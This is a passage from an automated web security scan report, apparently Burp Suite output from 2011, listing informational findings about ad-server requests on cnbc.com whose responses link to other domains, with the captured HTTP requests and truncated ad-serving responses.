5839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=14;tile=14;sz=88x31;~aopt=2/1/b7/1;~sscs=%3fhttps://us.etrade.com/e/t/welcome/whychooseetrade?SC=S047401&ch_id=D&s_id=CNBC&c_id=LGSTDBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_LogoTextPO_No_88x31.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

15.28. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=582942091860?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/6483212

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=582942091860? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Thu, 16 Jun 2011 11:24:52 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/6483212?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/3/0/%2a/w%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/1/b7/1%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/6483212" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/6483212"/></a>
...[SNIP]...

15.29. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/news_us

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=mergrnaqstns;pageid=43422860;!c=news;!c=us;tandomad=none;pm=1;qsg=2168;qsg=2006;qsg=2005;qsg=2004;qsg=2001;qsg=1994;qsg=1962;qsg=1914;qsg=384;qsg=381;qsg=380;qsg=379;qsg=378;qsg=377;qsg=333;qsg=332;qsg=326;qsg=321;qsg=316;pos=1;tile=1;sz=88x31;ord=137304223375?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3152351/1-32548_Just2Trade_88x31_Market_Overview_Badge.jpg

Request

GET /adj/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=mergrnaqstns;pageid=43422860;!c=news;!c=us;tandomad=none;pm=1;qsg=2168;qsg=2006;qsg=2005;qsg=2004;qsg=2001;qsg=1994;qsg=1962;qsg=1914;qsg=384;qsg=381;qsg=380;qsg=379;qsg=378;qsg=377;qsg=333;qsg=332;qsg=326;qsg=321;qsg=316;pos=1;tile=1;sz=88x31;ord=137304223375? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 797
Date: Thu, 16 Jun 2011 12:20:10 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/g;242265689;0-0;1;59662821;21-88/31;42519726/42537513/1;;~okv=;site=cnbc;sect=news;sub=us;sub2=mergrnaqstns;p
...[SNIP]...
bsg=106221;bsg=122122;;~aopt=2/1/b7/1;~sscs=%3fhttp://accounts.just2trade.com/balanding/land.aspx?Network=CNBC&Campaign=CNBCNewsChannel&utm_source=CNBC&utm_medium=banners&utm_campaign=CNBCNewsChannel"><img src="http://s0.2mdn.net/viewad/3152351/1-32548_Just2Trade_88x31_Market_Overview_Badge.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

15.30. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/news_us

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=728x90,970x66;ord=112909254851?

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png

Request

GET /adj/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=728x90,970x66;ord=112909254851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 5291
Date: Thu, 16 Jun 2011 11:25:00 GMT

var divid='dclkAdsDivID_8648';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_8648 = "<html><head><style><!--\na:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #f
...[SNIP]...
url%3Dhttp://www.cnbc.com/id/43418837%26hl%3Den%26client%3Dca-pub-5672557457834454%26adU%3Dwww.VAMortgageCenter.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFQyIDZDL08U7rnvs2n_5NwVFIKsQ\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

15.31. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/news_us

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=3;tile=3;sz=300x250,300x600,300x900,160x600;ord=112909254851?

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png

Request

GET /adj/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=3;tile=3;sz=300x250,300x600,300x900,160x600;ord=112909254851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 9885
Date: Thu, 16 Jun 2011 11:25:01 GMT

var divid='dclkAdsDivID_12034';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_12034 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\">
...[SNIP]...
3Dabg_afc%26url%3Dhttp://www.cnbc.com/id/43418837%26hl%3Den%26client%3Dca-pub-5672557457834454%26adU%3Dsamsclub.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNG-dYsAiuT_DzDy3wXabZmJ5pFiKg\" target=_blank><img alt=\"Ads by Google\" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...

15.32. http://ad.doubleclick.net/adj/nbcu.cnbc/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/search

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=809907126240?

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png

Request

GET /adj/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=809907126240? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 10103
Date: Thu, 16 Jun 2011 11:28:08 GMT

var divid='dclkAdsDivID_23605';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_23605 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\">
...[SNIP]...
l%2526keywords%253Dxss%2526categories%253Dexclude%26hl%3Den%26client%3Dca-pub-5672557457834454%26adU%3Dsamsclub.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEFYxjXuJQ96ilKeGLw1-97QVqvoQ\" target=_blank><img alt=\"Ads by Google\" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...

15.33. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; anj=Kfw)k=m<8a)J710KuqQv<wO[?.Z_6mQq(g8AdPznm4mV81(GwAdiq`tRFu9!<9WzID'dGuNsFx#:D$8):ECJr9*<7Y2B>h7#K-)26=S$JLUK>tc`oa^hD)BGY/HDIhRDv9`a)c=8Ns>'sTtY@rKf[42mEhF[x1(Z_WwCH=Q+CR#M/Pcv%qJCor_')4ZdnJAHJC!a[2QmvVUX0Y_AKQ6]5HO+=VJZ`Cn[.2-IAX7bw@(a6>NjWme_:Ez/L:lx+(-pIN(s?u*Kp^>>(5'p4ofX#f0tYcv/p_jyip?!*]Dhn<#nKj>zFXcZ3]cqTB$x8^Vcd3Q-9>LakKGuGRw!Wji-MU9XpC`s@ic92+2>.GL=U`b%(%gUKPx$]'`FGhEuD(sI?!QUr=v^-Mw`]j'Z.GUWgN$LX9J+!8fE#32>o8R`ORKPT@'^f3FPpl/vc(/uBHutpQhMdK68AZiL))1=C1hP-UYc7$L8HQ4R_fODEItt9)Se99+Gb46bp3t#1x-akYef0CGm/MocK_-@Tp5y1_eYlocCWH/?W=eW+d^NMAs)%MKv$X4.^owlwj<.lUF)12uChi8B:r08nN+5]N0mcIu/@qO$hlOz@IaFRGpZ*%hA-[It2owGgYBR3JoC5rww'EPwpN%zx; sess=1; uuid2=3420415245200633085

Response

15.34. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel

The response contains the following link to another domain:

http://content.yieldmanager.com/ak/q.gif

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:08:45 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 13:08:45 GMT
Pragma: no-cache
Content-Length: 4985
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

15.35. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The page was loaded from a URL containing a query string:

http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110617061054

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308305454?
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308305454%3Bdct=;ord=1308305454?
http://ad.doubleclick.net/adj/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308305454%3Bdct=;ord=1308305454?
http://ad.doubleclick.net/jump/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308305454?
http://cache.specificmedia.com/creative/blank.gif?ts=20110617061054&cmxid=2101.020012411000740428xmc

Request

GET /serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110617061054 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308305453032&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD; JSESSIONID=d14f5599fcc427d0b6d779a18539

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Jun 2011 10:10:54 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: Keep-Alive
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Length: 1309

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308305454%3Bdct=;ord=1308305454?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308305454%3Bdct=;ord=1308305454?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308305454?"><IMG SRC="http://ad.doubleclick.net/ad/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308305454?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A></NOSCRIPT></IFRAME><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110617061054&cmxid=2101.020012411000740428xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

15.36. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The page was loaded from a URL containing a query string:

http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110616104458

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308235498?
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498?
http://ad.doubleclick.net/adj/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498?
http://ad.doubleclick.net/jump/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308235498?
http://cache.specificmedia.com/creative/blank.gif?ts=20110616104458&cmxid=2101.020012411000740428xmc

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 14:44:58 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: Keep-Alive
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=8e98408250544b8c921948198003; Path=/
Vary: Accept-Encoding
Content-Length: 1309

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308235498?"><IMG SRC="http://ad.doubleclick.net/ad/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];ord=1308235498?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A></NOSCRIPT></IFRAME><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110616104458&cmxid=2101.020012411000740428xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

15.37. http://cas.criteo.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cas.criteo.com
Path:	/delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=

The response contains the following links to other domains:

http://gan.doubleclick.net/gan_impression?lid=41000000030310791&pubid=21000000000293450
http://pixel.adsafeprotected.com/?anId=124&pubId=test2&advId=netflix&campId=banner
http://pixel.adsafeprotected.com/jspix?anId=124&pubId=test2&advId=netflix&campId=banner

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Thu, 16 Jun 2011 13:08:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: OACBLOCK=; expires=Sat, 16-Jul-2011 13:08:02 GMT; path=/
Set-Cookie: OACCAP=; expires=Sat, 16-Jul-2011 13:08:02 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Set-Cookie: udc=*1CHZCRgIx6nSg3nCboPSuV5GDm6LZbYWApuRyCJPc%2bhchb5KpLbYf1Lu3OAJhT9WT3pwfiRHdLJOgnKf1ltoJegC3En0YtacsPpePTD4Vs%2femUcMNCMz2iyF3TS35px7NaUtIpAen77OgY4z8Fw92jSb5amVKhnzpAgWyOIczt3gvErTOrDuHbNuDjHOBlH30xvNbTy74RniR04mX6Oj1XZN%2feyZMFLdzAqv49%2f%2fIw4I%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:02 GMT; path=/
Set-Cookie: udi=*1wQWNbHL2BkixwAS4DgWF1g%3d%3d; domain=.criteo.com; expires=Fri, 17-Jun-2011 13:08:02 GMT; path=/
Content-Length: 3170

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<a h
...[SNIP]...
0%26octx%3d0%26oseg%3d-1%26populationids%3d%7bpopulationids%7d%26r%3dhttp%253A%252F%252Fgan.doubleclick.net%252Fgan_click%253Flid%253D41000000032401783%2526pubid%253D21000000000293450" target="_blank"><img src="http://gan.doubleclick.net/gan_impression?lid=41000000030310791&pubid=21000000000293450" border=0 alt="Netflix Standard Display Offer 728x90"></a>
...[SNIP]...
<div style="position: absolute; left: 0px; top: 0px; visibility: hidden;"><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=124&pubId=test2&advId=netflix&campId=banner"></script><noscript><img src="http://pixel.adsafeprotected.com?anId=124&pubId=test2&advId=netflix&campId=banner"></noscript>
...[SNIP]...

15.38. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000015500167&mid=112263b62011f106e31705c9403718&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112263b62011f106e31705c9403718

The response contains the following link to another domain:

http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=112263b62011f106e31705c9403718&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112263b62011f106e31705c9403718

Request

GET /link/click?lid=41000000015500167&mid=112263b62011f106e31705c9403718&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112263b62011f106e31705c9403718 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=1477&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 10:40:19 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=112263b62011f106e31705c9403718&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112263b62011f106e31705c9403718
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 10:40:19 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=112263b62011f106e31705c9403718&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112263b62011f106e31705c9403718">here</A>
...[SNIP]...

15.39. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000032191799&mid=111115b420113e068817052b40de13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D111115b420113e068817052b40de13

The response contains the following link to another domain:

